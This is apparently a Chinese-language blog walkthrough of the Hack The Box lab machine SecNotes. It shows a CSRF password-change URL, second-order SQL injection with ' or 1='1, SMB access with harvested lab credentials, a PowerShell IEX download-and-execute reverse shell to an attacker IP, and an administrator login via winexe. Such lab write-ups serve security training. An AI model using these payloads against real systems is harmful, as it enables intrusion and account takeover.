【Hack The Box】windows练习-- SecNotes
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月1日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
nmap -p- -T4 10.129.65.80 -sS --min-hostgroup 4
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
8808/tcp open ssports-bcast
然后再针对各个端口去扫,会快一些,发现了80和8808两个有html服务发现一个登陆框,但是并没有任何的密码或者账户提示,所以我们选择注册,并且寻求横向渗透的机会
发现了四个功能,修改密码很有意思,点开看一下
发现可以不用旧密码就可以修改,所以如果我们能用其他用户发出请求,那么他的密码就可以给改掉
接着发现了一个练习框,里面正是tyler用户的,让我输入我的地址,然后联系我?那就试试在我们本地开一个python的服务器
然后把我们的地址输进去,然后就发现多了一条连接记录,那就ok了,我们现在就需要抓包,看能不能通过get请求发送数据,因为我们这种简单简陋方式是不能用post发包的,如果get可以正常请求,那么我们把post数据包中的post体内容放到这个筐子里让他当作get数据来请求就行。
这就是被连接的信号
抓包发现可行
这是构造出的请求
http://10.129.65.80/change_pass.php/?password=1234&confirm_password=1234&submit=submit
但是我没搞出来我也不知道为啥,我看别人都能搞出来
之所以是二次注入,就是在注册点去搞的,然后登陆的时候被调用,往往危害更大
注册的时候账号密码都是‘ or 1='1
进去以后就发现了
\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
这里的话我们要注意一点,如果smb有组的关系,是要带上祖名的
smbclient //10.129.65.80/new-site -U tyler
我们发现正是之前发现的通过8808页面,说明我们可以上传后门直接拿shell
用msf生成一个shell然后反弹,但是非常不稳定
这种稍微稳定点,可以用nishang搞个ps,也可以用smbserver搞个cmd
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
python3 -m http.server 80
nc -nvlp 6969
Windows执行
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.16.3/shell.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -port 6969
我们在user,txt的同目录发现了base.ini,于是我们全局搜索一下
看能不能进去
where /R c:\ bash.exe
然后执行,创建一个稳定shell
python -c 'import pty;pty.spawn("/bin/bash")'
然后我们从根开始进行枚举
cd ~
cat .bash_history
他干了几件事,然后挂载了目录到filesystem,然后登陆了win的admin用户,我们在这里获得了密码,可以直接登陆
net use \\127.0.0.1\c$ /user:administrator "u6!4ZwgwOM#^OBf#Nwnh"
type \\127.0.0.1\c$\users\administrator\desktop\root.txt
winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe